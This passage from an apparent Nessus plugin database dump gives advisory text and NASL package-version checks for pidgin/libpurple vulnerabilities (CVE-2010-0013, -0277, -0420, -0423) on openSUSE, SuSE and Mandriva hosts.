script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of pidgin fixes various security vulnerabilities\n\n - CVE-2010-0013: CVSS v2 Base Score: 4.3: Path Traversal\n (CWE-22) Remote file disclosure vulnerability by using\n the MSN protocol.\n\n - CVE-2010-0277: CVSS v2 Base Score: 4.9: Resource\n Management Errors (CWE-399) MSN protocol plugin in\n libpurple allowed remote attackers to cause a denial of\n service (memory corruption) at least.\n\n - CVE-2010-0420 Same nick names in XMPP MUC lead to a\n crash in finch.\n\n - CVE-2010-0423 A remote denial of service attack\n (resource consumption) is possible by sending an IM with\n a lot of smilies in it.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=567799\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=569616\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected finch packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(20, 22, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-meanwhile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-mono\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"finch-2.6.6-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"finch-devel-2.6.6-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libpurple-2.6.6-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libpurple-devel-2.6.6-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libpurple-lang-2.6.6-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libpurple-meanwhile-2.6.6-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libpurple-mono-2.6.6-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"pidgin-2.6.6-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"pidgin-devel-2.6.6-0.1.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:39:22", "references": ["http://support.novell.com/security/cve/CVE-2010-0423.html", "http://support.novell.com/security/cve/CVE-2010-0277.html", "http://support.novell.com/security/cve/CVE-2010-0013.html", "http://support.novell.com/security/cve/CVE-2010-0420.html"], "pluginID": "51727", "description": "This update of pidgin fixes various security vulnerabilities :\n\n - Remote file disclosure vulnerability by using the MSN protocol. CVE-2010-0277: CVSS v2 Base Score: 4.9:\n Resource Management Errors (CWE-399) MSN protocol plugin in libpurple allowed remote attackers to cause a denial of service (memory corruption) at least. CVE-2010-0420:\n Same nick names in XMPP MUC lead to a crash in finch.\n CVE-2010-0423: A remote denial of service attack (resource consumption) is possible by sending an IM with a lot of smilies in it. (CVE-2010-0013: CVSS v2 Base Score: 4.3: Path Traversal (CWE-22))", "edition": 5, "reporter": "Tenable", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : pidgin (ZYPP Patch Number 6856)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2016-12-22T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FINCH-6856.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51727", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51727);\n script_version (\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:45 $\");\n\n script_cve_id(\"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n\n script_name(english:\"SuSE 10 Security Update : pidgin (ZYPP Patch Number 6856)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of pidgin fixes various security vulnerabilities :\n\n - Remote file disclosure vulnerability by using the MSN\n protocol. CVE-2010-0277: CVSS v2 Base Score: 4.9:\n Resource Management Errors (CWE-399) MSN protocol plugin\n in libpurple allowed remote attackers to cause a denial\n of service (memory corruption) at least. CVE-2010-0420:\n Same nick names in XMPP MUC lead to a crash in finch.\n CVE-2010-0423: A remote denial of service attack\n (resource consumption) is possible by sending an IM with\n a lot of smilies in it. (CVE-2010-0013: CVSS v2 Base\n Score: 4.3: Path Traversal (CWE-22))\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0277.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0420.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0423.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6856.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(20, 22, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"finch-2.6.6-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"libpurple-2.6.6-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"pidgin-2.6.6-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:09:34", "references": ["http://support.novell.com/security/cve/CVE-2010-0423.html", "http://support.novell.com/security/cve/CVE-2010-0277.html", "http://support.novell.com/security/cve/CVE-2010-0013.html", "https://bugzilla.novell.com/show_bug.cgi?id=567799", "https://bugzilla.novell.com/show_bug.cgi?id=569616", "http://support.novell.com/security/cve/CVE-2010-0420.html"], "pluginID": "44965", "description": "This update of pidgin fixes various security vulnerabilities :\n\n - Remote file disclosure vulnerability by using the MSN protocol. (CVE-2010-0013: CVSS v2 Base Score: 4.3 : Path Traversal (CWE-22))\n\n - MSN protocol plugin in libpurple allowed remote attackers to cause a denial of service (memory corruption) at least. (CVE-2010-0277: CVSS v2 Base Score: 4.9 : Resource Management Errors (CWE-399))\n\n - Same nick names in XMPP MUC lead to a crash in finch.\n (CVE-2010-0420)\n\n - A remote denial of service attack (resource consumption) is possible by sending an IM with a lot of smilies in it. (CVE-2010-0423)", "edition": 5, "reporter": "Tenable", "published": "2010-03-03T00:00:00", "title": "SuSE 11 Security Update : pidgin (SAT Patch Number 2019)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:libpurple", "p-cpe:/a:novell:suse_linux:11:libpurple-tcl", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:pidgin", "p-cpe:/a:novell:suse_linux:11:libpurple-lang", "p-cpe:/a:novell:suse_linux:11:finch", "p-cpe:/a:novell:suse_linux:11:pidgin-otr"], "id": "SUSE_11_FINCH-100219.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44965", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44965);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n\n script_name(english:\"SuSE 11 Security Update : pidgin (SAT Patch Number 2019)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of pidgin fixes various security vulnerabilities :\n\n - Remote file disclosure vulnerability by using the MSN\n protocol. (CVE-2010-0013: CVSS v2 Base Score: 4.3 : Path\n Traversal (CWE-22))\n\n - MSN protocol plugin in libpurple allowed remote\n attackers to cause a denial of service (memory\n corruption) at least. (CVE-2010-0277: CVSS v2 Base\n Score: 4.9 : Resource Management Errors (CWE-399))\n\n - Same nick names in XMPP MUC lead to a crash in finch.\n (CVE-2010-0420)\n\n - A remote denial of service attack (resource consumption)\n is possible by sending an IM with a lot of smilies in\n it. (CVE-2010-0423)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=567799\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=569616\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0277.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0420.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0423.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2019.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(20, 22, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libpurple-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:pidgin-otr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"finch-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libpurple-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libpurple-lang-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libpurple-tcl-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"pidgin-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"pidgin-otr-3.2.0-1.36.26\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"finch-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libpurple-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libpurple-lang-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libpurple-tcl-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"pidgin-2.6.6-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"pidgin-otr-3.2.0-1.36.26\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-03T10:20:45", "references": ["http://pidgin.im/news/security/"], "pluginID": "46177", "description": "Security vulnerabilities has been identified and fixed in pidgin :\n\nThe OSCAR protocol plugin in libpurple in Pidgin before 2.6.3 and Adium before 1.3.7 allows remote attackers to cause a denial of service (application crash) via crafted contact-list data for (1) ICQ and possibly (2) AIM, as demonstrated by the SIM IM client (CVE-2009-3615).\n\nDirectory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon (CVE-2010-0013).\n\nDirectory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon (CVE-2010-0013).\n\nCertain malformed SLP messages can trigger a crash because the MSN protocol plugin fails to check that all pieces of the message are set correctly (CVE-2010-0277).\n\nIn a user in a multi-user chat room has a nickname containing '<br>' then libpurple ends up having two users with username ' ' in the room, and Finch crashes in this situation. We do not believe there is a possibility of remote code execution (CVE-2010-0420).\n\noCERT notified us about a problem in Pidgin, where a large amount of processing time will be used when inserting many smileys into an IM or chat window. This should not cause a crash, but Pidgin can become unusable slow (CVE-2010-0423).\n\nPackages for 2009.0 are provided due to the Extended Maintenance Program.\n\nThis update provides pidgin 2.6.6, which is not vulnerable to these issues.", "edition": 7, "reporter": "Tenable", "published": "2010-04-29T00:00:00", "title": "Mandriva Linux Security Advisory : pidgin (MDVSA-2010:085)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2009-3615", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:pidgin-bonjour", "p-cpe:/a:mandriva:linux:lib64finch0", "p-cpe:/a:mandriva:linux:lib64purple0", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:pidgin-tcl", "p-cpe:/a:mandriva:linux:lib64purple-devel", "p-cpe:/a:mandriva:linux:pidgin-mono", "p-cpe:/a:mandriva:linux:pidgin-plugins", "p-cpe:/a:mandriva:linux:libpurple0", "p-cpe:/a:mandriva:linux:pidgin", "p-cpe:/a:mandriva:linux:pidgin-client", "p-cpe:/a:mandriva:linux:libfinch0", "p-cpe:/a:mandriva:linux:pidgin-gevolution", "p-cpe:/a:mandriva:linux:finch", "p-cpe:/a:mandriva:linux:pidgin-perl", "p-cpe:/a:mandriva:linux:pidgin-silc", "p-cpe:/a:mandriva:linux:pidgin-meanwhile", "p-cpe:/a:mandriva:linux:libpurple-devel", "p-cpe:/a:mandriva:linux:pidgin-i18n"], "id": "MANDRIVA_MDVSA-2010-085.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46177", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:085. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46177);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/01/02 16:37:54\");\n\n script_cve_id(\"CVE-2009-3615\", \"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(37524, 38294);\n script_xref(name:\"MDVSA\", value:\"2010:085\");\n\n script_name(english:\"Mandriva Linux Security Advisory : pidgin (MDVSA-2010:085)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security vulnerabilities has been identified and fixed in pidgin :\n\nThe OSCAR protocol plugin in libpurple in Pidgin before 2.6.3 and\nAdium before 1.3.7 allows remote attackers to cause a denial of\nservice (application crash) via crafted contact-list data for (1) ICQ\nand possibly (2) AIM, as demonstrated by the SIM IM client\n(CVE-2009-3615).\n\nDirectory traversal vulnerability in slp.c in the MSN protocol plugin\nin libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers\nto read arbitrary files via a .. (dot dot) in an\napplication/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a\nrelated issue to CVE-2004-0122. NOTE: it could be argued that this is\nresultant from a vulnerability in which an emoticon download request\nis processed even without a preceding text/x-mms-emoticon message that\nannounced availability of the emoticon (CVE-2010-0013).\n\nDirectory traversal vulnerability in slp.c in the MSN protocol plugin\nin libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers\nto read arbitrary files via a .. (dot dot) in an\napplication/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a\nrelated issue to CVE-2004-0122. NOTE: it could be argued that this is\nresultant from a vulnerability in which an emoticon download request\nis processed even without a preceding text/x-mms-emoticon message that\nannounced availability of the emoticon (CVE-2010-0013).\n\nCertain malformed SLP messages can trigger a crash because the MSN\nprotocol plugin fails to check that all pieces of the message are set\ncorrectly (CVE-2010-0277).\n\nIn a user in a multi-user chat room has a nickname containing '<br>'\nthen libpurple ends up having two users with username ' ' in the room,\nand Finch crashes in this situation. We do not believe there is a\npossibility of remote code execution (CVE-2010-0420).\n\noCERT notified us about a problem in Pidgin, where a large amount of\nprocessing time will be used when inserting many smileys into an IM or\nchat window. This should not cause a crash, but Pidgin can become\nunusable slow (CVE-2010-0423).\n\nPackages for 2009.0 are provided due to the Extended Maintenance\nProgram.\n\nThis update provides pidgin 2.6.6, which is not vulnerable to these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://pidgin.im/news/security/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 22, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64finch0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64purple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64purple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfinch0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpurple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-bonjour\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-gevolution\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-meanwhile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-mono\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-silc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", reference:\"finch-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64finch0-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64purple-devel-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64purple0-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libfinch0-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpurple-devel-2.6.6-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif 